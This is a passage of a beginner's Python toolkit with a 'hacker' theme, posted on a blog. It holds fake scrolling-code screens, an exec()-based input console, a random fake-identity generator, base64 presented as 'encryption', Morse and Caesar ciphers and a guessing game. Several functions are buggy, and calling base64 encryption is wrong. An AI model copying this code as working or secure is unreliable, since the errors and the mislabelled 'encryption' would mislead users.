error("键盘出现异常!程序重启……") sleep(0.1) continue def inpy_1(): while True: x = input(">>>") if x in globals().keys(): print(globals()[x]) continue try: exec(x) except Ellipsis as err: print(eer) def cjin_2(): s = 0 l = 6 t = sleep for n in range(10): print("\033[32m程序启动中...") print("\033[0m"+"█████"*s+"\033[32m█████"+"\033[0m█████"*l) s = s + 1 l = l - 1 t(1) if s == 6 and l == 0: s = 0 l = 6 print("\033[2J") print("\033[999999999A",end="") def cma_well(): writing=["q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m","Q","W","E","R","T","Y","U","I","O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M","0","1","2","3","4","5","6","7","8","9","_"] clock = strftime("%H:%M") b=0 while True: option=float(input("1.随机数字模式\n2.进入随机字母模式\n3.进入综合随机模式\n")) if option!=1: if option!=2: if option!=3: return 0 print("\033[2J") print("\033[999999999A",end="") sleep(0.5) if option==1: for i in range(randint(100,200)): print("\033[2J") print("\033[999999999A",end="") print(writing[randint(52,61)]+" "+writing[randint(52,61)]+" "+writing[randint(52,61)]+" "+writing[randint(52,61)]+" "+writing[randint(52,61)]+" "+writing[randint(52,61)]+" "+writing[randint(52,61)]+" "+writing[randint(52,61)]+" "+writing[randint(52,61)]+" "+writing[randint(52,61)]+" "+writing[randint(52,61)]+" "+writing[randint(52,61)]+" "+writing[randint(52,61)]+" "+writing[randint(52,61)]+"\n") sleep(0.085) clock = strftime("%H:%M") print(" "+clock) sleep(0.085) print("----------------------------") if option==2: for i in range(randint(100,200)): print("\033[2J") print("\033[999999999A",end="") print(writing[randint(1,51)]+" "+writing[randint(1,51)]+" "+writing[randint(1,51)]+" "+writing[randint(1,51)]+" "+writing[randint(1,51)]+" "+writing[randint(1,51)]+" "+writing[randint(1,51)]+" "+writing[randint(1,51)]+" "+writing[randint(1,51)]+" "+writing[randint(1,51)]+" "+writing[randint(1,51)]+" "+writing[randint(1,51)]+" "+writing[randint(1,51)]+" "+writing[randint(1,51)]+" "+"\n") sleep(0.085) clock = strftime("%H:%M") print(" "+clock) sleep(0.085) print("----------------------------") if option==3: for i in range(randint(100,200)): print("\033[2J") print("\033[999999999A",end="") print(writing[randint(1,62)]+" "+writing[randint(1,62)]+" _ "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+"\n") sleep(0.085) b=b+1 if b<5: print("\033[2J") print("\033[999999999A",end="") print(writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+writing[randint(1,62)]+" "+"\n") b=0 clock = strftime("%H:%M") print(" "+clock) sleep(0.085) print("----------------------------") #TODO def randomname(): class ClassGenerator: Adj = ["蓝色的","好看的","小小的","年轻的"] verb = ["看着","听着","看见","听见"] noun = ["女人","小猫","篮球","桌子"] Article = ["一个","这个"] def AdjGet(self): Adj_num = int(np.random.uniform(0, 4)) #形容词数量 assert Adj_num<=4 print("the num of adj is",Adj_num) adj_group_number =[random.randint(0,3) for i in range(Adj_num)] #list(np.random.uniform(0,4,Adj_num)) #形容词序号列表 np的随机函数返回的是ndarry多维数组 #print(adj_group_number.shape) adj_group = [] for i in range(Adj_num): k =adj_group_number[i] adj_group = "".join(adj_group)+self.Adj[k] return "".join(adj_group) #list转字符串 def verb_phrase_Gene(self): verb_num = int(np.random.uniform(0, 4)) noun_num = int(np.random.uniform(0, 4)) return self.verb[verb_num]+self.noun[noun_num] def noun_phrase_gene(self): Article_num = int(np.random.uniform(0, 2)) #np.random.uniform取值左右都闭,且返回值是float64类型! Adj_Group = self.AdjGet() noun_num = int(np.random.uniform(0, 3)) return self.Article[Article_num]+Adj_Group+self.noun[noun_num] def sentGene(self): noun_phr = self.noun_phrase_gene() verb_phr = self.verb_phrase_Gene() return noun_phr+verb_phr #print(">>generate(\"sentence\")") generate = ClassGenerator() sentence = generate.sentGene() def create_sex(): sex = random.choice('男女') return sex def create_age(): age = random.randint(18,99) return str(age) def create_telnum(): telnum = '' for i in range(11): num = random.randint(0,9) s = str(num) telnum += s return str(telnum) def create_email(): # 首先生成用户名 # 规定用户名由6~8位的随机大小写字母加数字组成 n1 = random.choice((6,8)) user_name = '' chars = string.ascii_letters + string.digits for i in range(n1): c = random.choice(chars) s = str(c) user_name += s # 再生成域名 # 规定域名由3~5位的随机大小写字母加数字组成 n2 = random.choice((3,5)) domain_name = '' for i in range(n2): c = random.choice(chars) s = str(c) domain_name += s # 随机选取后缀名 list2 = ['.com','.org','.net','.cn'] last_name = random.choice(list2) return user_name+'@'+domain_name+last_name def random_name(): Xing = "赵钱孙李周吴郑王冯陈褚卫蒋沈韩杨朱秦尤许何吕施张孔曹严华金魏陶姜戚谢邹喻水云苏潘葛奚范彭郎鲁韦昌马苗凤花方俞任袁柳鲍史唐费岑薛雷贺倪汤滕殷罗毕郝邬安常乐于时傅卞齐康伍余元卜顾孟平" \ "黄和穆萧尹姚邵湛汪祁毛禹狄米贝明臧计成戴宋茅庞熊纪舒屈项祝董粱杜阮席季麻强贾路娄危江童颜郭梅盛林***钟徐邱骆高夏蔡田胡凌霍万柯卢莫房缪干解应宗丁宣邓郁单杭洪包诸左石崔吉" \ "龚程邢滑裴陆荣翁荀羊甄家封芮储靳邴松井富乌焦巴弓牧隗山谷车侯伊宁仇祖武符刘景詹束龙叶幸司韶黎乔苍双闻莘劳逄姬冉宰桂牛寿通边燕冀尚农温庄晏瞿茹习鱼容向古戈终居衡步都耿满弘国文东殴沃曾关红游盖益桓公晋楚闫" Ming = '中笑贝凯歌易仁器义礼智信友上都卡被好无九加电金马钰玉忠孝秀娟英华慧巧美娜静淑惠珠翠雅芝玉萍红娥玲芬芳燕彩春菊兰凤洁梅琳素云莲真环雪荣爱妹霞香月莺媛艳瑞凡佳嘉琼勤珍贞莉桂娣叶璧璐娅琦晶妍茜秋珊莎锦黛青倩婷姣婉娴瑾颖露瑶怡婵雁蓓纨仪荷丹蓉眉君琴蕊薇菁梦岚苑婕馨瑗琰韵融园艺咏卿聪澜纯毓悦昭冰爽琬茗羽希宁欣飘育滢馥筠柔竹霭凝晓欢霄枫芸菲寒伊亚宜可姬舒影荔枝思丽' X = random.choice(Xing) M = "".join(random.choice(Ming) for i in range(2)) name = X + M return name print("姓名:",random_name()) print("个性签名:",sentence) print("性别:",create_sex()) print("年龄:",create_age()) print("电话号码:",create_telnum()) print("邮箱:",create_email()) def cio_base_1(): str = input("需要加密的明文:") print((base64.b64encode(str.encode())).decode()) def cio_base_2(): en_str = input("需要解密的密文:") print((base64.b64decode(en_str.encode())).decode()) def ms_1(): morse_src = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', ', ', '.', '?', '/', '-', '(', ')'] morse_en = ['.-', '-...', '-.-.', '-..', '.', '..-.', '--.', '....', '..', '.---', '-.-', '.-..', '--', '-.', '---', '.--.', '--.-', '.-.', '...', '-', '..-', '...-', '.--', '-..-', '-.--', '--..', '.----', '..---', '...--', '....-', '.....', '-....', '--...', '---..', '----.', '-----', '--..--', '.-.-.-', '..--..', '-..-.', '-....-', '-.--.', '-.--.-'] str = input("需要加密的明文:").upper() for i in str: print(morse_en[morse_src.index(i)],end=' ') def ms_2(): str = input("需要解密的密文:") en_list = str.split(' ') for i in en_list: print(morse_src[morse_en.index(i)],end='') def ks_1(): key = int(input("输入密钥:")) str = input("需要加密的明文:") for i in str: # 大写字母和小写字母分开处理 if i.isupper(): # 用ord()将字母转成ascii码值,然后加上偏移位数 # 对26取模是为了让字母偏移后能在字母表中循环,最后加上A的ASCII码值还原成字母 print(chr(65+(ord(i)-65+key)%26),end='') if i.islower(): print(chr(97 + (ord(i) - 97 + key) % 26), end='') def ks_2(): str = input("需要解密的密文:") for key in range(1,26): for i in str: if i.isupper(): print(chr(65+(ord(i)-65-key+26)%26),end='') if i.islower(): print(chr(97 + (ord(i) - 97 - key+26) % 26), end='') print('') def flang(): text = input("输入信息: ") print(detect(text)) def fnumber(): number = random.randint(0, 100) number = random.randint(0, 100) for i in range(10): choice = int(input("请输入你要猜测的数字:")) if choice > number: print("你猜大了") elif choice < number: print("你猜小了") else: print("你猜对了,真棒!") print(f"你一共用了{i + 1}次机会") break print(f"还剩{9 - i}次机会") else: print("游戏结束你还没有猜到。") #TODO:代码正式结束 #TODO:结束时间:2023.3.15 19:59 #TODO:版本号:V1.0.0 #TODO:结束行数:1272View Code
标签:CZHA0,end,游戏,黑客,sleep,print,033,find,name From: https://www.cnblogs.com/czoffice/p/17254307.html